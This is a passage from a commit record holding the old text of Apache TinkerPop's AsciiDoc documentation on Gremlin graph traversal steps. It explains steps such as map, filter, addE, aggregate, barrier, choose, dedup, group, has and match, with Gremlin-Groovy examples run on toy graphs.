`vertexCriterion` (if present) in order for the `Edge` to be considered a part of the subgraph.\n","old_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n[[traversal]]\nThe Traversal\n=============\n\nimage::gremlin-running.png[width=125]\n\nAt the most general level there is `Traversal<S,E>` which implements `Iterator<E>`, where the `S` stands for start and the `E` stands for end. A traversal is composed of four primary components:\n \n . `Step<S,E>`: an individual function applied to `S` to yield `E`. Steps are chained within a traversal.\n . `TraversalStrategy`: interceptor methods to alter the execution of the traversal (e.g. query re-writing).\n . `TraversalSideEffects`: key\/value pairs that can be used to store global information about the traversal.\n . `Traverser<T>`: the object propagating through the `Traversal` currently representing an object of type `T`. \n\nThe classic notion of a graph traversal is provided by `GraphTraversal<S,E>` which extends `Traversal<S,E>`. `GraphTraversal` provides an interpretation of the graph data in terms of vertices, edges, etc. and thus, a graph traversal link:http:\/\/en.wikipedia.org\/wiki\/Domain-specific_language[DSL].\n\nIMPORTANT: The underlying `Step` implementations provided by TinkerPop should encompass most of the functionality required by a DSL author. It is important that DSL authors leverage the provided steps as then the common optimization and decoration strategies can reason on the underlying traversal sequence. If new steps are introduced, then common traversal strategies may not function properly.\n\n[[graph-traversal-steps]]\nGraph Traversal Steps\n---------------------\n\nimage::step-types.png[width=650]\n\nA `GraphTraversal<S,E>` is spawned from a `GraphTraversalSource`. It can also be spawned anonymously (i.e. empty) via `__`. A graph traversal is composed of an ordered list of steps. All the steps provided by `GraphTraversal` inherit from the more general forms diagrammed above. A list of all the steps (and their descriptions) are provided in the TinkerPop3 link:http:\/\/www.tinkerpop.com\/javadocs\/x.y.z\/core\/org\/apache\/tinkerpop\/gremlin\/process\/graph\/GraphTraversal.html[GraphTraversal JavaDoc]. The following subsections will demonstrate the GraphTraversal steps using the <<gremlin-console,Gremlin Console>>.\n\nNOTE: To reduce the verbosity of the expression, it is good to `import static org.apache.tinkerpop.gremlin.process.traversal.dsl.graph.__.*`. This way, instead of doing `__.inE()` for an anonymous traversal, it is possible to simply write `inE()`. Be aware of language-specific reserved keywords when using anonymous traversals. For example, `in` and `as` are reserved keywords in Groovy, therefore you must use the verbose syntax `__.in()` and `__.as()` to avoid collisions.\n\n[[lambda-steps]]\nLambda Steps\n~~~~~~~~~~~~\n\nCAUTION: Lambda steps are presented for educational purposes as they represent the foundational constructs of the Gremlin language. In practice, lambda steps should be avoided and traversal verification strategies exist to disallow their use unless explicitly \"turned off.\" For more information on the problems with lambdas, please read <<a-note-on-lambdas,A Note on Lambdas>>.\n\nThere are four generic steps by which all other specific steps described later extend.\n\n[width=\"100%\",cols=\"10,12\",options=\"header\"]\n|=========================================================\n| Step| Description\n| `map(Function<Traverser<S>, E>)` | map the traverser to some object of type `E` for the next step to process.\n| `flatMap(Function<Traverser<S>, Iterator<E>>)` | map the traverser to an iterator of `E` objects that are streamed to the next step.\n| `filter(Predicate<Traverser<S>>)` | map the traverser to either true or false, where false will not pass the traverser to the next step.\n| `sideEffect(Consumer<Traverser<S>>)` | perform some operation on the traverser and pass it to the next step.\n| `branch(Function<Traverser<S>,M>)` | split the traverser to all the traversals indexed by the `M` token.\n|=========================================================\n\nThe `Traverser<S>` object provides access to:\n\n . The current traversed `S` object -- `Traverser.get()`.\n . The current path traversed by the traverser -- `Traverser.path()`.\n .. A helper shorthand to get a particular path-history object -- `Traverser.path(String) == Traverser.path().get(String)`.\n . The number of times the traverser has gone through the current loop -- `Traverser.loops()`.\n . The number of objects represented by this traverser -- `Traverser.bulk()`.\n . The local data structure associated with this traverser -- `Traverser.sack()`.\n . The side-effects associated with the traversal -- `Traverser.sideEffects()`.\n .. A helper shorthand to get a particular side-effect -- `Traverser.sideEffect(String) == Traverser.sideEffects().get(String)`.\n\nimage:map-lambda.png[width=150,float=right]\n[gremlin-groovy,modern]\n----\ng.V(1).out().values('name') <1>\ng.V(1).out().map {it.get().value('name')} <2>\n----\n\n<1> An outgoing traversal from vertex 1 to the name values of the adjacent vertices.\n<2> The same operation, but using a lambda to access the name property values.\n\nimage:filter-lambda.png[width=160,float=right]\n[gremlin-groovy,modern]\n----\ng.V().filter {it.get().label() == 'person'} <1>\ng.V().hasLabel('person') <2>\n----\n\n<1> A filter that only allows the vertex to pass if it has an age-property.\n<2> The more specific `has()`-step is implemented as a `filter()` with respective predicate.\n\n\nimage:side-effect-lambda.png[width=175,float=right]\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').sideEffect(System.out.&println) <1>\n----\n\n<1> Whatever enters `sideEffect()` is passed to the next step, but some intervening process can occur.\n\nimage:branch-lambda.png[width=180,float=right]\n[gremlin-groovy,modern]\n----\ng.V().branch(values('name')).\n option('marko', values('age')).\n option(none, values('name')) <1>\ng.V().choose(has('name','marko'),\n values('age'),\n values('name')) <2>\n----\n\n<1> If the vertex is \"marko\", get his age, else get the name of the vertex.\n<2> The more specific boolean-based `choose()`-step is implemented as a `branch()`.\n\n[[addedge-step]]\nAddEdge Step\n~~~~~~~~~~~~\n\nlink:http:\/\/en.wikipedia.org\/wiki\/Automated_reasoning[Reasoning] is the process of making explicit what is implicit in the data. What is explicit in a graph are the objects of the graph -- i.e. vertices and edges. What is implicit in the graph is the traversal. In other words, traversals expose meaning where the meaning is determined by the traversal definition. For example, take the concept of a \"co-developer.\" Two people are co-developers if they have worked on the same project together. This concept can be represented as a traversal and thus, the concept of \"co-developers\" can be derived. Moreover, what was once implicit can be made explicit via the `addE()`-step (*map*\/*sideEffect*).\n\nimage::addedge-step.png[width=450]\n\n[gremlin-groovy,modern]\n----\ng.V(1).as('a').out('created').in('created').where(neq('a')).\n addE('co-developer').from('a').property('year',2009) <1>\ng.V(3,4,5).aggregate('x').has('name','josh').as('a').\n select('x').unfold().hasLabel('software').addE('createdBy').to('a') <2>\ng.V().as('a').out('created').addE('createdBy').to('a').property('acl','public') <3>\ng.V(1).as('a').out('knows').\n addE('livesNear').from('a').property('year',2009).\n inV().inE('livesNear').values('year') <4>\ng.V().match(\n __.as('a').out('knows').as('b'),\n __.as('a').out('created').as('c'),\n __.as('b').out('created').as('c')).\n addE('friendlyCollaborator').from('a').to('b').\n property(id,13).property('project',select('c').values('name')) <5>\ng.E(13).valueMap()\n----\n\n<1> Add a co-developer edge with a year-property between marko and his collaborators.\n<2> Add incoming createdBy edges from the josh-vertex to the lop- and ripple-vertices.\n<3> Add an inverse createdBy edge for all created edges.\n<4> The newly created edge is a traversable object.\n<5> Two arbitrary bindings in a traversal can be joined `from()`->`to()`, where `id` can be provided for graphs that supports user provided ids.\n\n[[addvertex-step]]\nAddVertex Step\n~~~~~~~~~~~~~~\n\nThe `addV()`-step is used to add vertices to the graph (*map*\/*sideEffect*). For every incoming object, a vertex is created. Moreover, `GraphTraversalSource` maintains an `addV()` method.\n\n[gremlin-groovy,modern]\n----\ng.addV('person').property('name','stephen')\ng.V().values('name')\ng.V().outE('knows').addV().property('name','nothing')\ng.V().has('name','nothing')\ng.V().has('name','nothing').bothE()\n----\n\n[[addproperty-step]]\nAddProperty Step\n~~~~~~~~~~~~~~~~\n\nThe `property()`-step is used to add properties to the elements of the graph (*sideEffect*). Unlike `addV()` and `addE()`, `property()` is a full sideEffect step in that it does not return the property it created, but the element that streamed into it. Moreover, if `property()` follows an `addV()` or `addE()`, then it is \"folded\" into the previous step to enable vertex and edge creation with all its properties in one creation operation.\n\n[gremlin-groovy,modern]\n----\ng.V(1).property('country','usa')\ng.V(1).property('city','santa fe').property('state','new mexico').valueMap()\ng.V(1).property(list,'age',35) <1>\ng.V(1).valueMap()\ng.V(1).property('friendWeight',outE('knows').values('weight').sum(),'acl','private') <2>\ng.V(1).properties('friendWeight').valueMap() <3>\n----\n\n<1> For vertices, a cardinality can be provided for <<vertex properties,vertex-properties>>.\n<2> It is possible to select the property value (as well as key) via a traversal.\n<3> For vertices, the `property()`-step can add meta-properties.\n\n\n[[aggregate-step]]\nAggregate Step\n~~~~~~~~~~~~~~\n\nimage::aggregate-step.png[width=800]\n\nThe `aggregate()`-step (*sideEffect*) is used to aggregate all the objects at a particular point of traversal into a Collection. The step uses link:http:\/\/en.wikipedia.org\/wiki\/Eager_evaluation[eager evaluation] in that no objects continue on until all previous objects have been fully aggregated (as opposed to <<store-step,`store()`>> which link:http:\/\/en.wikipedia.org\/wiki\/Lazy_evaluation[lazily] fills a collection). The eager evaluation nature is crucial in situations where everything at a particular point is required for future computation. An example is provided below.\n\n[gremlin-groovy,modern]\n----\ng.V(1).out('created') <1>\ng.V(1).out('created').aggregate('x') <2>\ng.V(1).out('created').aggregate('x').in('created') <3>\ng.V(1).out('created').aggregate('x').in('created').out('created') <4>\ng.V(1).out('created').aggregate('x').in('created').out('created').\n where(without('x')).values('name') <5>\n----\n\n<1> What has marko created?\n<2> Aggregate all his creations.\n<3> Who are marko's collaborators?\n<4> What have marko's collaborators created?\n<5> What have marko's collaborators created that he hasn't created?\n\nIn link:http:\/\/en.wikipedia.org\/wiki\/Recommender_system[recommendation systems], the above pattern is used:\n \n \"What has userA liked? Who else has liked those things? What have they liked that userA hasn't already liked?\"\n\nFinally, `aggregate()`-step can be modulated via `by()`-projection.\n\n[gremlin-groovy,modern]\n----\ng.V().out('knows').aggregate('x').cap('x')\ng.V().out('knows').aggregate('x').by('name').cap('x')\n----\n\n[[and-step]]\nAnd Step\n~~~~~~~~\n\nThe `and()`-step ensures that all provided traversals yield a result (*filter*). Please see <<or-step,`or()`>> for or-semantics.\n\n[gremlin-groovy,modern]\n----\ng.V().and(\n outE('knows'),\n values('age').is(lt(30))).\n values('name')\n----\n\nThe `and()`-step can take an arbitrary number of traversals. All traversals must produce at least one output for the original traverser to pass to the next step.\n\nAn link:http:\/\/en.wikipedia.org\/wiki\/Infix_notation[infix notation] can be used as well. Though, with infix notation, only two traversals can be and'd together.\n\n[gremlin-groovy,modern]\n----\ng.V().where(outE('created').and().outE('knows')).values('name')\n----\n\n[[as-step]]\nAs Step\n~~~~~~~\n\nThe `as()`-step is not a real step, but a \"step modulator\" similar to <<by-step,`by()`>> and <<option-step,`option()`>>. With `as()`, it is possible to provide a label to the step that can later be accessed by steps and data structures that make use of such labels -- e.g., <<select-step,`select()`>>, <<match-step,`match()`>>, and path.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out('created').as('b').select('a','b') <1>\ng.V().as('a').out('created').as('b').select('a','b').by('name') <2>\n----\n\n<1> Select the objects labeled \"a\" and \"b\" from the path.\n<2> Select the objects labeled \"a\" and \"b\" from the path and, for each object, project its name value.\n\nA step can have any number of labels associated with it. This is useful for referencing the same step multiple times in a future step.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('software').as('a','b','c').\n select('a','b','c').\n by('name').\n by('lang').\n by(__.in('created').values('name').fold())\n----\n\n[[barrier-step]]\nBarrier Step\n~~~~~~~~~~~~\n\nThe `barrier()`-step (*barrier*) turns the the lazy traversal pipeline into a bulk-synchronous pipeline. This step is useful in the following situations:\n\n * When everything prior to `barrier()` needs to be executed before moving onto the steps after the `barrier()` (i.e. ordering).\n * When \"stalling\" the traversal may lead to a \"bulking optimization\" in traversals that repeatedly touch many of the same elements (i.e. optimizing).\n\n[gremlin-groovy,modern]\n----\ng.V().sideEffect{println \"first: ${it}\"}.sideEffect{println \"second: ${it}\"}.iterate()\ng.V().sideEffect{println \"first: ${it}\"}.barrier().sideEffect{println \"second: ${it}\"}.iterate()\n----\n\nThe theory behind a \"bulking optimization\" is simple. If there are one million traversers at vertex 1, then there is no need to calculate one million `both()`-computations. Instead, represent those one million traversers as a single traverser with a `Traverser.bulk()` equal to one million and execute `both()` once. A bulking optimization example is made more salient on a larger graph. Therefore, the example below leverages the <<grateful-dead,Grateful Dead graph>>.\n\n[gremlin-groovy]\n----\ngraph = TinkerGraph.open()\ngraph.io(graphml()).readGraph('data\/grateful-dead.xml')\ng = graph.traversal(standard())\nclockWithResult(1){g.V().both().both().both().count().next()} <1>\nclockWithResult(1){g.V().repeat(both()).times(3).count().next()} <2>\nclockWithResult(1){g.V().both().barrier().both().barrier().both().barrier().count().next()} <3>\n----\n\n<1> A non-bulking traversal where each traverser is processed.\n<2> Each traverser entering `repeat()` has its recursion bulked.\n<3> A bulking traversal where implicit traversers are not processed.\n\nIf `barrier()` is provided an integer argument, then the barrier will only hold `n`-number of unique traversers in its barrier before draining the aggregated traversers to the next step. This is useful in the aforementioned bulking optimization scenario, but reduces the risk of an out-of-memory exception.\n\nThe non-default `LazyBarrierStrategy` inserts `barrier()`-steps in a traversal where appropriate in order to gain the \"bulking optimization.\"\n\n[gremlin-groovy]\n----\ngraph = TinkerGraph.open()\ngraph.io(graphml()).readGraph('data\/grateful-dead.xml')\ng = graph.traversal(GraphTraversalSource.build().with(LazyBarrierStrategy.instance()).engine(StandardTraversalEngine.build()))\nclockWithResult(1){g.V().both().both().both().count().next()}\ng.V().both().both().both().count().iterate().toString() <1>\n----\n\n<1> With `LazyBarrierStrategy` activated, `barrier()` steps are automatically inserted where appropriate.\n\n[[by-step]]\nBy Step\n~~~~~~~\n\nThe `by()`-step is not an actual step, but instead is a \"step-modulator\" similar to <<as-step,`as()`>> and <<option-step,`option()`>>. If a step is able to accept traversals, functions, comparators, etc. then `by()` is the means by which they are added. The general pattern is `step().by()...by()`. Some steps can only accept one `by()` while others can take an arbitrary amount.\n\n[gremlin-groovy,modern]\n----\ng.V().group().by(bothE().count()) <1>\ng.V().group().by(bothE().count()).by('name') <2>\ng.V().group().by(bothE().count()).by('name').by(count(local)) <3>\n----\n\n<1> `by(outE().count())` will group the elements by their edge count (*traversal*).\n<2> `by('name')` will process the grouped elements by their name (*element property projection*).\n<3> `by(count(local))` will count the number of elements in each group (*traversal*).\n\n[cap-step]]\nCap Step\n~~~~~~~~\n\nThe `cap()`-step (*barrier*) iterates the traversal up to itself and emits the sideEffect referenced by the provided key. If multiple keys are provided, then a `Map<String,Object>` of sideEffects is emitted.\n\n[gremlin-groovy,modern]\n----\ng.V().groupCount('a').by(label).cap('a') <1>\ng.V().groupCount('a').by(label).groupCount('b').by(outE().count()).cap('a','b') <2>\n----\n\n<1> Group and count verticies by their label. Emit the side effect labeled 'a', which is the group count by label.\n<2> Same as statement 1, but also emit the side effect labeled 'b' which groups vertices by the number of out edges.\n\n[[coalesce-step]]\nCoalesce Step\n~~~~~~~~~~~~~\n\nThe `coalesce()`-step evaluates the provided traversals in order and returns the first traversal that emits at least one element.\n\n[gremlin-groovy,modern]\n----\ng.V(1).coalesce(outE('knows'), outE('created')).inV().path().by('name').by(label)\ng.V(1).coalesce(outE('created'), outE('knows')).inV().path().by('name').by(label)\ng.V(1).next().property('nickname', 'okram')\ng.V().hasLabel('person').coalesce(values('nickname'), values('name'))\n----\n\n[[count-step]]\nCount Step\n~~~~~~~~~~\n\nimage::count-step.png[width=195]\n\nThe `count()`-step (*map*) counts the total number of represented traversers in the streams (i.e. the bulk count).\n\n[gremlin-groovy,modern]\n----\ng.V().count()\ng.V().hasLabel('person').count()\ng.V().hasLabel('person').outE('created').count().path() <1>\ng.V().hasLabel('person').outE('created').count().map {it.get() * 10}.path() <2>\n----\n\n<1> `count()`-step is a <<a-note-on-barrier-steps,reducing barrier step>> meaning that all of the previous traversers are folded into a new traverser.\n<2> The path of the traverser emanating from `count()` starts at `count()`.\n\nIMPORTANT: `count(local)` counts the current, local object (not the objects in the traversal stream). This works for `Collection`- and `Map`-type objects. For any other object, a count of 1 is returned.\n\n[[choose-step]]\nChoose Step\n~~~~~~~~~~~\n\nimage::choose-step.png[width=700]\n\nThe `choose()`-step (*branch*) routes the current traverser to a particular traversal branch option. With `choose()`, it is possible to implement if\/else-based semantics as well as more complicated selections.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').\n choose(values('age').is(lte(30)),\n __.in(),\n __.out()).values('name') <1>\ng.V().hasLabel('person').\n choose(values('age')).\n option(27, __.in()).\n option(32, __.out()).values('name') <2>\n----\n\n<1> If the traversal yields an element, then do `in`, else do `out` (i.e. true\/false-based option selection).\n<2> Use the result of the traversal as a key to the map of traversal options (i.e. value-based option selection).\n\nHowever, note that `choose()` can have an arbitrary number of options and moreover, can take an anonymous traversal as its choice function.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').\n choose(values('name')).\n option('marko', values('age')).\n option('josh', values('name')).\n option('vadas', valueMap()).\n option('peter', label())\n----\n\nThe `choose()`-step can leverage the `Pick.none` option match. For anything that does not match a specified option, the `none`-option is taken.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').\n choose(values('name')).\n option('marko', values('age')).\n option(none, values('name'))\n----\n\n[[coin-step]]\nCoin Step\n~~~~~~~~~\n\nTo randomly filter out a traverser, use the `coin()`-step (*filter*). The provided double argument biases the \"coin toss.\"\n\n[gremlin-groovy,modern]\n----\ng.V().coin(0.5)\ng.V().coin(0.0)\ng.V().coin(1.0)\n----\n\n[[constant-step]]\nConstant Step\n~~~~~~~~~~~~~\n\nTo specify a constant value for a traverser, use the `constant()`-step (*map*). This is often useful with conditional steps like <<choose-step,`choose()`-step>> or <<coalesce-step,`coalesce()`-step>>.\n\n[gremlin-groovy,modern]\n----\ng.V().choose(__.hasLabel('person'),\n __.values('name'),\n __.constant('inhuman')) <1>\ng.V().coalesce(\n __.hasLabel('person').values('name'),\n __.constant('inhuman')) <2>\n----\n\n<1> Show the names of people, but show \"inhuman\" for other vertices.\n<2> Same as statement 1 (unless there is a person vertex with no name).\n\n[[cyclicpath-step]]\nCyclicPath Step\n~~~~~~~~~~~~~~~\n\nimage::cyclicpath-step.png[width=400]\n\nEach traverser maintains its history through the traversal over the graph -- i.e. its <<path-data-structure,path>>. If it is important that the traverser repeat its course, then `cyclic()`-path should be used (*filter*). The step analyzes the path of the traverser thus far and if there are any repeats, the traverser is filtered out over the traversal computation. If non-cyclic behavior is desired, see <<simplepath-step,`simplePath()`>>.\n\n[gremlin-groovy,modern]\n----\ng.V(1).both().both()\ng.V(1).both().both().cyclicPath()\ng.V(1).both().both().cyclicPath().path()\n----\n\n[[dedup-step]]\nDedup Step\n~~~~~~~~~~\n\nWith `dedup()`-step (*filter*), repeatedly seen objects are removed from the traversal stream. Note that if a traverser's bulk is greater than 1, then it is set to 1 before being emitted.\n\n[gremlin-groovy,modern]\n----\ng.V().values('lang')\ng.V().values('lang').dedup()\ng.V(1).repeat(bothE('created').dedup().otherV()).emit().path() <1>\n----\n\n<1> Traverse all `created` edges, but don't touch any edge twice.\n\nIf a by-step modulation is provided to `dedup()`, then the object is processed accordingly prior to determining if it has been seen or not.\n\n[gremlin-groovy,modern]\n----\ng.V().valueMap(true, 'name')\ng.V().dedup().by(label).values('name')\n----\n\nFinally, if `dedup()` is provided an array of strings, then it will ensure that the de-duplication is not with respect to the current traverser object, but to the path history of the traverser.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out('created').as('b').in('created').as('c').select('a','b','c')\ng.V().as('a').out('created').as('b').in('created').as('c').dedup('a','b').select('a','b','c') <1>\n----\n\n<1> If the current `a` and `b` combination has been seen previously, then filter the traverser.\n\n[[drop-step]]\nDrop Step\n~~~~~~~~~\n\nThe `drop()`-step (*filter*\/*sideEffect*) is used to remove element and properties from the graph (i.e. remove). It is a filter step because the traversal yields no outgoing objects.\n\n[gremlin-groovy,modern]\n----\ng.V().outE().drop()\ng.E()\ng.V().properties('name').drop()\ng.V().valueMap()\ng.V().drop()\ng.V()\n----\n\n[[fold-step]]\nFold Step\n~~~~~~~~~\n\nThere are situations when the traversal stream needs a \"barrier\" to aggregate all the objects and emit a computation that is a function of the aggregate. The `fold()`-step (*map*) is one particular instance of this. Please see <<unfold-step,`unfold()`>>-step for the inverse functionality.\n\n[gremlin-groovy,modern]\n----\ng.V(1).out('knows').values('name')\ng.V(1).out('knows').values('name').fold() <1>\ng.V(1).out('knows').values('name').fold().next().getClass() <2>\ng.V(1).out('knows').values('name').fold(0) {a,b -> a + b.length()} <3>\ng.V().values('age').fold(0) {a,b -> a + b} <4>\ng.V().values('age').fold(0, sum) <5>\ng.V().values('age').sum() <6>\n----\n\n<1> A parameterless `fold()` will aggregate all the objects into a list and then emit the list.\n<2> A verification of the type of list returned.\n<3> `fold()` can be provided two arguments -- a seed value and a reduce bi-function (\"vadas\" is 5 characters + \"josh\" with 4 characters).\n<4> What is the total age of the people in the graph?\n<5> The same as before, but using a built-in bi-function.\n<6> The same as before, but using the <<sum-step,`sum()`-step>>.\n\n[[group-step]]\nGroup Step\n~~~~~~~~~~\n\nAs traversers propagate across a graph as defined by a traversal, sideEffect computations are sometimes required. That is, the actual path taken or the current location of a traverser is not the ultimate output of the computation, but some other representation of the traversal. The `group()`-step (*sideEffect*) is one such sideEffect that organizes the objects according to some function of the object. Then, if required, that organization (a list) is reduced. An example is provided below.\n\n[gremlin-groovy,modern]\n----\ng.V().group().by(label) <1>\ng.V().group().by(label).by('name') <2>\ng.V().group().by(label).by('name').by(count(local)) <3>\n----\n\n<1> Group the vertices by their label.\n<2> For each vertex in the group, get their name.\n<3> For each grouping, what is its size?\n\nThe three projection parameters available to `group()` via `by()` are:\n\n. Key-projection: What feature of the object to group on (a function that yields the map key)?\n. Value-projection: What feature of the group to store in the key-list?\n. Reduce-projection: What feature of the key-list to ultimately return?\n\n[[groupcount-step]]\nGroupCount Step\n~~~~~~~~~~~~~~~\n\nWhen it is important to know how many times a particular object has been at a particular part of a traversal, `groupCount()`-step (*sideEffect*) is used.\n\n \"What is the distribution of ages in the graph?\"\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').values('age').groupCount()\ng.V().hasLabel('person').groupCount().by('age') <1>\n----\n\n<1> You can also supply a pre-group projection, where the provided <<by-step,`by()`>>-modulation determines what to group the incoming object by.\n\nThere is one person that is 32, one person that is 35, one person that is 27, and one person that is 29.\n\n \"Iteratively walk the graph and count the number of times you see the second letter of each name.\"\n\nimage::groupcount-step.png[width=420]\n\n[gremlin-groovy,modern]\n----\ng.V().repeat(both().groupCount('m').by(label)).times(10).cap('m')\n----\n\nThe above is interesting in that it demonstrates the use of referencing the internal `Map<Object,Long>` of `groupCount()` with a string variable. Given that `groupCount()` is a sideEffect-step, it simply passes the object it received to its output. Internal to `groupCount()`, the object's count is incremented.\n\n[[has-step]]\nHas Step\n~~~~~~~~\n\nimage::has-step.png[width=670]\n\nIt is possible to filter vertices, edges, and vertex properties based on their properties using `has()`-step (*filter*). There are numerous variations on `has()` including:\n\n * `has(key,value)`: Remove the traverser if its element does not have the provided key\/value property.\n * `has(key,predicate)`: Remove the traverser if its element does not have a key value that satisfies the bi-predicate.\n * `hasLabel(labels...)`: Remove the traverser if its element does not have any of the labels.\n * `hasId(ids...)`: Remove the traverser if its element does not have any of the ids.\n * `hasKey(keys...)`: Remove the traverser if its property does not have any of the keys.\n * `hasValue(values...)`: Remove the traverser if its property does not have any of the values.\n * `has(key)`: Remove the traverser if its element does not have a value for the key.\n * `hasNot(key)`: Remove the traverser if its element has a value for the key.\n * `has(key, traversal)`: Remove the traverser if its object does not yield a result through the traversal off the property value.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person')\ng.V().hasLabel('person').out().has('name',within('vadas','josh'))\ng.V().hasLabel('person').out().has('name',within('vadas','josh')).\n outE().hasLabel('created')\ng.V().has('age',inside(20,30)).values('age') <1>\ng.V().has('age',outside(20,30)).values('age') <2>\ng.V().has('name',within('josh','marko')).valueMap() <3>\ng.V().has('name',without('josh','marko')).valueMap() <4>\ng.V().has('name',not(within('josh','marko'))).valueMap() <5>\n----\n\n<1> Find all vertices whose ages are between 20 (inclusive) and 30 (exclusive).\n<2> Find all vertices whose ages are not between 20 (inclusive) and 30 (exclusive).\n<3> Find all vertices whose names are exact matches to any names in the the collection `[josh,marko]`, display all the key,value pairs for those verticies.\n<4> Find all vertices whose names are not in the collection `[josh,marko]`, display all the key,value pairs for those vertices.\n<5> Same as the prior example save using `not` on `within` to yield `without`.\n\nTinkerPop does not support a regular expression predicate, although specific graph databases that leverage TinkerPop may\nprovide a partial match extension.\n\n[[inject-step]]\nInject Step\n~~~~~~~~~~~\n\nimage::inject-step.png[width=800]\n\nOne of the major features of TinkerPop3 is \"injectable steps.\" This makes it possible to insert objects arbitrarily into a traversal stream. In general, `inject()`-step (*sideEffect*) exists and a few examples are provided below.\n\n[gremlin-groovy,modern]\n----\ng.V(4).out().values('name').inject('daniel')\ng.V(4).out().values('name').inject('daniel').map {it.get().length()}\ng.V(4).out().values('name').inject('daniel').map {it.get().length()}.path()\n----\n\nIn the last example above, note that the path starting with `daniel` is only of length 2. This is because the `daniel` string was inserted half-way in the traversal. Finally, a typical use case is provided below -- when the start of the traversal is not a graph object.\n\n[gremlin-groovy,modern]\n----\ninject(1,2)\ninject(1,2).map {it.get() + 1}\ninject(1,2).map {it.get() + 1}.map {g.V(it.get()).next()}.values('name')\n----\n\n[[is-step]]\nIs Step\n~~~~~~~\n\nIt is possible to filter scalar values using `is()`-step (*filter*).\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').is(32)\ng.V().values('age').is(lte(30))\ng.V().values('age').is(inside(30, 40))\ng.V().where(__.in('created').count().is(1)).values('name') <1>\ng.V().where(__.in('created').count().is(gte(2))).values('name') <2>\ng.V().where(__.in('created').values('age').\n mean().is(inside(30d, 35d))).values('name') <3>\n----\n\n<1> Find projects having exactly one contributor.\n<2> Find projects having two or more contributors.\n<3> Find projects whose contributors average age is between 30 and 35.\n\n[[limit-step]]\nLimit Step\n~~~~~~~~~~\n\nThe `limit()`-step is analogous to <<range-step,`range()`-step>> save that the lower end range is set to 0.\n\n[gremlin-groovy,modern]\n----\ng.V().limit(2)\ng.V().range(0, 2)\ng.V().limit(2).toString()\n----\n\nThe `limit()`-step can also be applied with `Scope.local`, in which case it operates on the incoming collection. The examples below use the <<the-crew-toy-graph,The Crew>> toy data set.\n\n[gremlin-groovy,theCrew]\n----\ng.V().valueMap().select('location').limit(local,2) <1>\ng.V().valueMap().limit(local, 1) <2>\n----\n\n<1> `List<String>` for each vertex containing the first two locations.\n<2> `Map<String, Object>` for each vertex, but containing only the first property value.\n\n[[local-step]]\nLocal Step\n~~~~~~~~~~\n\nimage::local-step.png[width=450]\n\nA `GraphTraversal` operates on a continuous stream of objects. In many situations, it is important to operate on a single element within that stream. To do such object-local traversal computations, `local()`-step exists (*branch*). Note that the examples below use the <<the-crew-toy-graph,The Crew>> toy data set.\n\n[gremlin-groovy,theCrew]\n----\ng.V().as('person').\n properties('location').order().by('startTime',incr).limit(2).value().as('location').\n select('person','location').by('name').by() <1>\ng.V().as('person').\n local(properties('location').order().by('startTime',incr).limit(2)).value().as('location').\n select('person','location').by('name').by() <2>\n----\n\n<1> Get the first two people and their respective location according to the most historic location start time.\n<2> For every person, get their two most historic locations.\n\nThe two traversals above look nearly identical save the inclusion of `local()` which wraps a section of the traversal in a object-local traversal. As such, the `order().by()` and the `limit()` refer to a particular object, not to the stream as a whole.\n\nWARNING: The anonymous traversal of `local()` processes the current object \"locally.\" In OLAP, where the atomic unit of computing is the the vertex and its local \"star graph,\" it is important that the anonymous traversal does not leave the confines of the vertex's star graph. In other words, it can not traverse to an adjacent vertex's properties or edges.\n\n[[mapkeys-step]]\nMapKeys Step\n~~~~~~~~~~~~\n \nThe `mapKeys()`-step (*flatMap*) takes an incoming map and emits its keys. This is especially useful when one is only interested in the top N elements in a `groupCount()` ranking.\n \n[gremlin-groovy]\n----\ngraph.io(graphml()).readGraph('data\/grateful-dead.xml')\ng = graph.traversal(standard())\ng.V().hasLabel(\"song\").out(\"followedBy\").groupCount().by(\"name\").\n order(local).by(valueDecr).limit(local, 5)\ng.V().hasLabel(\"song\").out(\"followedBy\").groupCount().by(\"name\").\n order(local).by(valueDecr).limit(local, 5).mapKeys()\n----\n\n[[mapvalues-step]]\nMapValues Step\n~~~~~~~~~~~~~~\n \nThe `mapValues()`-step (*flatMap*) takes an incoming map and emits its values.\n \n[gremlin-groovy]\n----\ngraph.io(graphml()).readGraph('data\/grateful-dead.xml')\ng = graph.traversal(standard())\n:set max-iteration 10\ng.V().hasLabel(\"song\").out(\"sungBy\").groupCount().by(\"name\").next() <1>\ng.V().hasLabel(\"song\").out(\"sungBy\").groupCount().by(\"name\").mapValues() <2>\ng.V().hasLabel(\"song\").out(\"sungBy\").groupCount().by(\"name\").mapValues().groupCount().\n order(local).by(valueDecr).limit(local, 5).next() <3>\n----\n \n<1> Which artist sung how many songs?\n<2> Get an anonymized set of song repertoire sizes.\n<3> What are the 5 most common song repertoire sizes?\n\n[[match-step]]\nMatch Step\n~~~~~~~~~~\n\nThe `match()`-step (*map*) provides a more link:http:\/\/en.wikipedia.org\/wiki\/Declarative_programming[declarative] form of graph querying based on the notion of link:http:\/\/en.wikipedia.org\/wiki\/Pattern_matching[pattern matching]. With `match()`, the user provides a collection of \"traversal fragments,\" called patterns, that have variables defined that must hold true throughout the duration of the `match()`. When a traverser is in `match()`, a registered `MatchAlgorithm` analyzes the current state of the traverser (i.e. its history based on its <<path-data-structure,path data>>), the runtime statistics of the traversal patterns, and returns a traversal-pattern that the traverser should try next. The default `MatchAlgorithm` provided is called `CountMatchAlgorithm` and it dynamically revises the pattern execution plan by sorting the patterns according to their filtering 